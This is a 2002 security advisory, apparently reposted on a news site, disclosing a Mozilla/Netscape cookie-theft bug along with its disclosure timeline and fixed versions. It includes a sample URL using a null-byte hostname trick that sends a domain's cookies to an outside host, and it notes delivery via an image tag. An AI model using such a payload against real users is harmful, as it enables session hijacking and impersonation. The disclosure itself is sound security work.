Mozilla Cookie Exploit

    Date22 Jan 2002
    2692
    Posted ByAnthony Pell
    A while ago I discovered a bug in Mozilla that lets you steal cookies for any domain by convincing the browser to load a specially formatted URL; I have been too busy to get around to making the details known earlier, so here they are. This is similar to holes that have been found, both by myself and by others, previous in IE.. . . A while ago I discovered a bug in Mozilla that lets you steal cookies for any domain by convincing the browser to load a specially formatted URL; I have been too busy to get around to making the details known earlier, so here they are. This is similar to holes that have been found, both by myself and by others, previous in IE.
     Date: Mon, 21 Jan 2002 21:10:37 -0800 (PST) From: Marc Slemko  To: This email address is being protected from spambots. You need JavaScript enabled to view it. Subject: Mozilla Cookie Exploit  A while ago I discovered a bug in Mozilla that lets you steal cookies for any domain by convincing the browser to load a specially formatted URL; I have been too busy to get around to making the details known earlier, so here they are.  This is similar to holes that have been found, both by myself and by others, previous in IE.  Details available at http://alive.znep.com/~marcs/security/mozillacookie/ and are also included below.  Update to Netscape 6.2.1 or Mozilla 0.9.7 for a fix.  Using open source products doesn't magically make you invulnerable to security problems like those that plague Microsoft.                              Mozilla Cookie Exploit                         Marc Slemko                  Last Modified: $Date: 2002/01/22 05:06:04 $                               $Revision: 1.6 $                                        Table of Contents     [1]Executive Summary    [2]What's New    [3]Background    [4]Details    [5]Example Exploit     Executive Summary     Cookies are often used to identify and authenticate users to a    website. If an attacker can steal a user's cookies, then they can    impersonate that user. The completeness of the impersonation and the    actions the attacker can perform as that user depend on how the    particular site uses the cookies.        This bug in Mozilla allows an attacker to, if he can convince the    user's browser to load a given URL, steal their cookies for any given    domain. It does not require that active scripting is enabled in the    browser, and can be done with something as simple as an image tag,    allowing for hassle free use in HTML email, web based email services,    etc.        As expected, this bug is also present in Netscape 6.1. Upgrade to    Netscape 6.2.1 or Mozilla 0.9.7 or higher, which fix this bug.        The take-away message is that, due to implementation bugs in browser    and in web applications, cookies can be stolen. It is critical that    any application that depends on cookies does so with an understanding    of this fact, and takes appropriate measures to limit the damage that    can be done using stolen cookies.     What's New       * Current Status Summary: (last updated Mon Jan 21 20:48:17 PST        2002) I finally got around to making this vulnerability public.      * mid-Jan 2002: Netscape put up a [6]note on their site saying that        there was a security hole that they fixed.      * Sometime between when I reported this bug to Netscape and when I        made it public: This bug was fixed with the release of Netscape        6.2.1 and Mozilla 0.9.7.      * November 15, 2001: I reported this bug to Netscape via their        security bug submission form. I had trouble finding a documented        method for submitting security bugs to mozilla.org, but eventually        figured out that This email address is being protected from spambots. You need JavaScript enabled to view it. existed. In any case, both        submissions found their way to the same contact at Netscape.         Background     Cookies are the mechanism used by most websites to identify and    authenticate a user. If you can steal someone's cookies, you can trick    the server into thinking you are them. Exactly what this gains you    depends on the application and how it is designed. It may gain you    very little, or it may gain you a whole lot (eg. [7]Microsoft Passport    to Trouble). For more information about cookies, see [8]The Unofficial    Cookie FAQ.        Cookies are set with a specific hostname or a domain, so that they are    only sent to that host or domain, with an exception or two that I    won't go into here. They can also be set with a specific path, or with    the secure flag, which means they will only be sent if the connection    is a SSL connection. Normally, this should mean that only the server    that set the cookie, or others it is operating in cooperation with    (eg. in the same domain) can read it.        Mozilla has a bug that lets you bypass this protection and steal    cookies for any domain. This is quite similar to bugs found in    Microsoft Internet Explorer in the past, such as [9]this one and    [10]this one. As has been shown time and time again, there are many    security flaws in many Microsoft products. Sadly, they are far from    being alone. There is almost certainly no web browser out there that    is functional enough to browse a significant percent of current    popular websites and that does not have similar security holes.     Details     The details are very trivial. Loading a URL such as:         http://alive.znep.com%00www.passport.com/cgi-bin/cookies     ...will cause Mozilla to connect to the hostname specified before the    "%00", but send the cookies to the server based on the entire    hostname. The "%00" is the URL encoded version of the null character,    used in C to terminate strings.        This exploit can be used to steal cookies with a specific path set,    and can be used to steal cookies with the secure flag set, by using    the specific path and SSL in the request URL. Note, however, that    cookies set for a specific hostname (eg. "www.passport.com") can not    be stolen using this method, but only cookies set for an entire domain    (eg. ".passport.com").        This bug was first tested on Netscape 6.1 on Windows 2000 and Mozilla    0.9.5 build 2001111503 and 0.9.5 build 20011012 on Linux. It is    expected that all Netscape 6.x and Mozilla versions prior to the    recently released fixed versions are vulnerable.     Example Exploit     An example exploit [11]is available. Very straightforward.      _________________________________________________________________        $Id: index.html,v 1.6 2002/01/22 05:06:04 marcs Exp marcs $      _________________________________________________________________  References     1. http://alive.znep.com/~marcs/security/mozillacookie/#executivesummary    2. http://alive.znep.com/~marcs/security/mozillacookie/#history    3. http://alive.znep.com/~marcs/security/mozillacookie/#background    4. http://alive.znep.com/~marcs/security/mozillacookie/#details    5. http://alive.znep.com/~marcs/security/mozillacookie/#example    6. http://home.netscape.com/security/    7. http://alive.znep.com/~marcs/passport/    8. http://www.cookiecentral.com/faq/    9. http://alive.znep.com/~marcs/security/iecookie1/   10. http://alive.znep.com/~marcs/security/iecookie2/   11. http://alive.znep.com/~marcs/security/mozillacookie/demo.html 
    You are not authorised to post comments.

    LinuxSecurity Poll

    Has your email account ever been pwned in a data breach?

    No answer selected. Please try again.
    Please select either existing option or enter your own, however not both.
    Please select minimum 0 answer(s) and maximum 2 answer(s).
    /component/communitypolls/?task=poll.vote
    12
    radio
    [{"id":"53","title":"Yes","votes":"8","type":"x","order":"1","pct":88.89,"resources":[]},{"id":"54","title":"No","votes":"1","type":"x","order":"2","pct":11.11,"resources":[]}]["#ff5b00","#4ac0f2","#b80028","#eef66c","#60bb22","#b96a9a","#62c2cc"]["rgba(255,91,0,0.7)","rgba(74,192,242,0.7)","rgba(184,0,40,0.7)","rgba(238,246,108,0.7)","rgba(96,187,34,0.7)","rgba(185,106,154,0.7)","rgba(98,194,204,0.7)"]350
    bottom200

    We use cookies to provide and improve our services. By using our site, you consent to our Cookie Policy.